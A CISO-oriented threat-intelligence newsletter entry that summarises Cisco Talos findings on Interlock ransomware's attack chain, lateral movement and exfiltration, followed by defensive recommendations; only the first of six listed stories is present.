CISO Intelligence for 11th November: Premium Edition

Table of Contents

1. Attack of the Clones: Interlock Ransomware Unwrapped by Cisco Talos
2. Silent Skimmer Returns: A 'Shhh' With a Bang
3. The Mythical BlueNoroff Strikes Again: Mac Users Beware!
4. Attackers Leverage DocuSign's Trust to Send Deluge of Fraudulent Invoices
5. Russian Bears Bargain: Tech for Troops with a North Korean Twist
6. Phantom Menace: An Extortionist's Demand from AT&T

Attack of the Clones: Interlock Ransomware Unwrapped by Cisco Talos

Board Briefing

Cisco Talos revealed a new risk in the ransomware landscape with the emergence of Interlock ransomware. This threat utilizes various multifaceted components for infiltration and is suspected to be linked to the notorious Rhysida operators. Immediate prioritization of strengthening network defences, especially against Remote Access Tool and RDP vulnerabilities, is recommended.

CISO's Challenge to the Team

1. Conduct a comprehensive review of current remote access protocols and establish reinforced safeguards particularly against RDP and RAT usage.
2. Identify and mitigate any potential vulnerabilities stemming from PowerShell scripts and credential stealers, ensuring swift detection and containment.

Supplier Questions

1. How effectively can your solution detect and block unauthorized use of remote desktop protocols and tools like AnyDesk and PuTTY?
2. What enhancements can you offer for real-time monitoring and alerting of suspicious Azure Storage blob activities?

CISO focus: Threat Intelligence and Incident Response
Sentiment: Strong Negative
Time to Impact: Immediate

Watch out, the Interlock is picking locks; it's not a locksmith but rather a deft cyber thief.

The Reveal

Cisco Talos has unveiled a troubling addition to the ransomware landscape with the emergence of Interlock ransomware, underscoring the persistent and evolving threats posed by cybercriminal entities. Interlock, which Talos suggests might have roots in the Rhysida ransomware syndicate, has surfaced as a significant challenge to enterprise security architecture, demanding immediate action from cybersecurity teams.

Anatomy of an Attack

Interlock is distinguished by its comprehensive delivery chain, which comprises multiple malign components—each playing a crucial role in the lifecycle of the attack. The intrusion begins with a Remote Access Tool (RAT) that masquerades as a benign browser updater. Upon infiltration, PowerShell scripts and other malicious tools, including a credential stealer and a keylogger, are deployed. This sewer of malicious activity sets the stage for the pivotal attack: the deployment of the ransomware encryptor binary.

Here's a breakdown of the attack vector pipeline:

• Entry Point: The initial access point leverages social engineering tactics—a RAT cloaked as a browser update.
• Establish Foothold: The payload is laid with PowerShell scripts aiding in network maneuverability and persistence.
• Credential Harvesting: A stowed-away credential stealer collects and relays sensitive access data.
• Data Gathering: Keyloggers intercept keystrokes, further magnifying the threat to the victim's data integrity.
• Execution and Encryption: The culminating ransomware is deployed, causing widespread disruption and data encryption.

Lateral Movement and Data Exfiltration

One of the surveillance conclusions made by Cisco Talos revolves around how the attackers move laterally within networks. Remote desktop protocol (RDP) stands out as a favorite mechanism for these threat actors, enabling them to leap between network nodes with surprising ease. Complementary tools like AnyDesk and PuTTY serve as auxiliary strategies, expanding the potential vectors for deeper infiltration.

To compound the damage, Interlock operatives utilize Azure Storage Explorer—a mechanism reliant on the AZCopy utility—for siphoning data to a secured attacker-controlled cloud blob. This technical maneuver allows for sizeable data loads to be covertly exfiltrated, heightening the stakes for affected enterprises both legally and operationally.

Timeline of Mayhem

Cisco Talos has gauged the average time from initial compromise to full encryption execution at approximately 17 bittersweet days—a duration within which many organizations might remain blissfully unaware of lurking danger until it’s too late. This underlines the critical need for rapid detection, response, and remediation capabilities within organizations to minimize potential exposure windows.

Possible Origins and Connections

Interestingly, Talos posits that Interlock ransomware might be the product of evolution from the notorious Rhysida ransomware operators. This assessment, while shrouded in low confidence, finds basis in overlapping tactics, techniques, and procedures (TTPs) and similarities in the ransomware binaries employed.

Defensive Measures and Strategic Focus

In response to the Interlock murder of cyber innocence, we propose the following defensive measures:

• Prioritized Asset Protection: Restrict and monitor access points linked to RDP, implementing multi-factor authentication where viable.
• Heightened Detection Systems: Deploy increased monitoring around PowerShell script executions to detect anomalies.
• Credential Management: Bolster infrastructure against credential harvesting through enhanced encryption and access controls.
• Exfiltration Alerts: Activate stringent logging and real-time alerts for Azure Storage Explorer activities to deter unauthorized deployments.

Staying Ahead in the Cyber Game

As this newest threat unfolds, organizations are reminded of the relentless invention and adaptability characteristic of cyber attackers. The emergence of Interlock underscores the importance of remaining vigilant and proactive, constantly evolving security postures to safeguard sensitive enterprise assets against these evolving threats. In the world where digital locks are constantly picked, staying a step ahead is not just advisable but essential for survival.